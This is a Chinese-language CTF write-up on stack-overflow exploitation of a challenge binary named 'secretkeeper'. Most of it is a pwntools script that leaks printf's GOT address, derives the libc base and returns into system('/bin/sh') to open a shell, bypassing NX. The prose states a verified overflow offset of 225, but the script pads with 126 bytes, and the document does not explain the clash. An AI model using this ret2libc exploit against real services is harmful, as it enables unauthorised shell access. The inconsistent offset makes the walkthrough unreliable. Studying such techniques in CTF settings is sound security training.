栈溢出利用小结
栈溢出是最简单的漏洞了,主要是通过学习栈溢出,学习其绕过保护机制的利用。
这里先用一道典型的题secretkeeper来进入。利用方式就是典型的地址泄露+ret2libc。
其漏洞的位置在修改secret的时候出现的:
现在我们来测一下。输入选择4,然后300个A,程序出现问题。
现在找到漏洞了,就太好了,接下来就是计算溢出点了。
溢出点在偏移225处,验证一下,输入225 * "A"+"BBBB".
果然程序的EIP到了我们的BBBB上面了,说明偏移正确。下面就是如何来绕过NX了。绕过方式就是ret2libc。
1 from pwn import * 2 debug = 1 3 local = 1 4 if local: 5 io = process(\'./secretkeeper\') 6 else: 7 io = remote("127.0.0.0",8080) 8 9 context.log_level = \'debug\' 10 11 if debug: 12 gdb.attach(io) 13 #gdb.attach(pidof(\'secretkeeper\')[-1]) 14 15 #-------------------------------------------------------# 16 17 def create(): 18 io.recvuntil(\'Please input your option:\') 19 io.sendline(\'1\') 20 io.recvuntil(\'Enter secret name:\') 21 io.sendline(\'name\') 22 io.recvuntil(\'Enter your password:\') 23 io.sendline(\'pass\') 24 io.recvuntil("Enter the secret level (The bigger the more important):") 25 io.sendline(\'10\') 26 io.recvuntil(\'Enter your secret:\') 27 io.sendline(\'AAAA\') 28 29 def edit(payload): 30 io.recvuntil(\'Please input your option:\') 31 io.sendline(\'4\') 32 io.recvuntil(\'Enter the name of the secret to EDIT:\') 33 io.sendline(\'name\') 34 io.recvuntil(\'Enter your password:\') 35 io.sendline(\'pass\') 36 io.recvuntil(\'Enter the new level:\') 37 io.sendline(\'2\') 38 io.recvuntil(\'Enter your secret:\') 39 io.sendline(\'2\') 40 io.recvuntil(\'y/n\') 41 io.sendline(payload) 42 43 #----------------------------------------------------------# 44 45 print_plt = 0x080484A0 46 main = 0x08048A8F 47 print_got = 0x0804B00C 48 49 payload = \'A\'*126 50 payload += p32(print_plt) + p32(main) +p32(print_got) 51 52 create() 53 edit(payload) 54 55 io.recvuntil(\'Your changes have been recorded!\') 56 io.recvline() 57 print_got_addr = u32(io.recv(4)) 58 print \'print_got_addr=\' ,hex(print_got_addr) 59 60 libc =ELF(\'/lib/i386-linux-gnu/libc.so.6\') 61 libc_addr = print_got_addr - libc.symbols[\'printf\'] 62 63 system_got = libc_addr + libc.symbols[\'system\'] 64 print \'system_got=\' ,hex(system_got) 65 66 ssh_addr = libc_addr + next(libc.search(\'/bin/sh\')) 67 print \'ssh_addr=\' ,hex(ssh_addr) 68 69 payload1 = \'A\'*126 70 payload1 += p32(system_got) + p32(main) +p32(ssh_addr) 71 72 create() 73 edit(payload1) 74 #gdb.attach(p,open( \'aa\')) 75 76 77 io.interactive()
参考文档:
ret2libc:http://blog.csdn.net/linyt/article/details/43643499
http://blog.csdn.net/guilanl/article/details/61921481